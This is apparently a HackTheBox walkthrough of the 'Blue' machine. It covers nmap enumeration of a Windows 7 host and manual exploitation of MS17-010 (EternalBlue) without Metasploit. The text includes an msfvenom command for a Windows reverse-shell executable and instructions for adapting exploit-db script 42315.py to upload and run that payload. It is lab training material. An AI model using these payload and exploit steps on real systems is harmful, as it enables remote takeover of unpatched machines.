HackTheBox — Blue (w/o Metasploit)
Here’s a fun and quick Windows challenge to practice on. If you’re using Metasploit, it’ll likely take more time to scan with nmap, load Metasploit, and run the exploit than it will to figure out what needs to be done. But as with majority of my HTB walkthroughs, I’m going to be doing these without the use of Metasploit for those who are reading this for OSCP preparation.
Enumeration
We start by scanning this computer using the following line with nmap
nmap -n -sS -sV -O -A -T4 10.10.10.40This should run an aggressive (-T4) default TCP SYN scan (-sS) and give us the version of each protocol (-sV), OS information (-O and -A), while ignoring DNS resolution (-n). Below are the results of this scan with the parts to pay attention to in bold.
root@kali:~# nmap -n -sS -sV -O -A -T4 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 22:24 EDT
Nmap scan report for 10.10.10.40
Host is up (0.091s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/8%OT=135%CT=1%CU=32883%PV=Y%DS=2%DC=T%G=Y%TM...
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -13m22s, deviation: 34m36s, median: 6m35s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-10-09T03:32:48+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-09T02:32:45
|_ start_date: 2020-10-09T02:04:43
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 115.53 ms 10.10.14.1
2 115.61 ms 10.10.10.40
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.02 seconds
Based on these results, we can see that we have a machine running Windows 7 Professional 7601 Service Pack 1 with SMB access and guest logon.
We can enumerate further by using a few nmap scripts. One way to see what scripts are available is to use the following command:
cat /usr/share/nmap/scripts/script.db | grep smbThis will give you a list of scripts along with their categories. To clean it up a bit, we can add this to the cat command:
cat /usr/share/nmap/scripts/script.db | grep smb | cut -d'"' -f2This returns a list of available nmap scripts that we can use. I’ve highlighted the ones that we’ll be using in bold.
smb-brute.nse
smb-double-pulsar-backdoor.nse
smb-enum-domains.nse
smb-enum-groups.nse
smb-enum-processes.nse
smb-enum-services.nse
smb-enum-sessions.nse
smb-enum-shares.nse
smb-enum-users.nse
smb-flood.nse
smb-ls.nse
smb-mbenum.nse
smb-os-discovery.nse
smb-print-text.nse
smb-protocols.nse
smb-psexec.nse
smb-security-mode.nse
smb-server-stats.nse
smb-system-info.nse
smb-vuln-conficker.nse
smb-vuln-cve-2017-7494.nse
smb-vuln-cve2009-3103.nse
smb-vuln-ms06-025.nse
smb-vuln-ms07-029.nse
smb-vuln-ms08-067.nse
smb-vuln-ms10-054.nse
smb-vuln-ms10-061.nse
smb-vuln-ms17-010.nse
smb-vuln-regsvc-dos.nse
smb-vuln-webexec.nse
smb-webexec-exploit.nse
smb2-capabilities.nse
smb2-security-mode.nse
smb2-time.nse
smb2-vuln-uptime.nseBack to enumerating SMB. We can use some of the scripts listed above to enumerate further and to scan for vulnerabilities. The following command will run all enumeration scripts listed above:
sudo nmap -p139,445 --script=smb-enum-* 10.10.10.40This provides some interesting information to note for later.
root@kali:~# nmap -p139,445 --script=smb-enum-* 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 22:03 EDT
Nmap scan report for 10.10.10.40
Host is up (0.085s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|_smb-enum-domains: ERROR: Script execution failed (use -d to debug)
|_smb-enum-groups: ERROR: Script execution failed (use -d to debug)
| smb-enum-shares:
| account_used: guest
| \\10.10.10.40\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.40\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.40\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: READ
| Current user access: READ/WRITE
| \\10.10.10.40\Share:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
| Current user access: READ
| \\10.10.10.40\Users:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
|_ Current user access: READ
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 55.84 secondsNext, let’s run the vulnerability scanning scripts using this command:
nmap -p139,445 --script=smb-vuln-* 10.10.10.40Below are the results from this scan
root@kali:~# nmap -p139,445 --script=smb-vuln-* 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 22:11 EDT
Nmap scan report for 10.10.10.40
Host is up (0.083s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 14.83 secondsPerfect! The results from our nmap vulnerability scan shows that this server is vulnerable to MS17-010, a.k.a. EternalBlue (which explains the name of this challenge). Now, we can always use Metasploit and run the windows/smb/ms17_010_eternalblue exploit for this. But let’s try this manually instead.
Exploitation
Let’s start by looking for an exploit. We can check exploitdb for an appropriate exploit by running searchsploit ms17-010.
According to our initial nmap scan, we noticed that this machine was running Windows 7 Professional 7601 Service Pack 1. Looking at our searchsploit results, 42315.py looks like our best match. The script isn't ready to run out of the box however. We'll need to make a few changes. It’s important to analyze any exploit code before using it for several reasons. First, you want to make sure it’s reliable and trustworthy. Second, it’s important to understand how it works in case you need to modify it for your specific use.
Before we start, copy the python file to your working directory so that you’re not modifying the original. Open it up in a text editor of your choice and change the USERNAME value to // since guest logon is allowed (seen in our nmap scans from earlier).
Next, let’s look at the payload section.
Right now, this script will only create a text file on the C drive of the victim's computer named “pwned.txt”. We'll need to modify this part to transfer our own payload. We can transfer and execute a variety of payloads on this machine, but right now we're only interested in getting a reverse shell. To do this, let’s generate a reverse shell payload using msfvenom. For those who are reading this in preparation for the OSCP, at the time that I'm writing this, using msfvenom to create payloads is perfectly acceptable as long as your payload doesn't open a meterpreter session.
To create a reverse shell payload, we can use the following msfvenom command (replacing LHOST with your own IP address):
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=443 -f exe > binary.exeNow that we have our payload, let's modify the exploit code to transfer our binary.exe file and run it on the victim's machine.
Be sure to replace the file path seen above (/root/Document/htb/blue/) with the path to the payload you just generated. Before running the script, remember to open a netcat listener on port 443 (or whatever you put as your LPORT value when generating your msfvenom payload).
Now to run the script. You can run it using the following line:
python 42315.py 10.10.10.40By the way, if you receive an error saying “No module named mysmb”, copy this into the same directory as your exploit: https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
I had to try running this exploit several times for it to work. Try it 5 or 6 times waiting a few seconds in between and check your netcat listener to see what happens. After a few repeated runs, I saw that sweet sweet response that makes everything better:
User and Root Flags
Now that we have a system level shell and don't need to worry about privilege escalation, let's grab the flags. Checking the C:\Users directory, we see only haris and the administrator.
The flags for HTB Windows machines are located in the user's desktop directory. To read the user.txt file, we'll check C:\Users\haris\Desktop\user.txt
And finally, we'll check C:\Users\Administrator\Desktop\root.txt for the root flag.
Final Thoughts
If you’re relatively new to CTF and wargames, this is a great machine to play with and see EternalBlue in action. I highly recommend familiarizing yourself with MS17–010 as you’ll likely see this one more often than you’d expect. It’s also a good idea to learn how to use it manually. As is the case with most exploits, learning how to exploit EternalBlue via Metasploit isn’t much of a challenge in my opinion. It’s definitely faster, but it doesn’t teach much. Understanding the details of how an exploit works and how you can customize it to your advantage is a much better investment of time. I hope you enjoyed this walkthrough. Good luck!
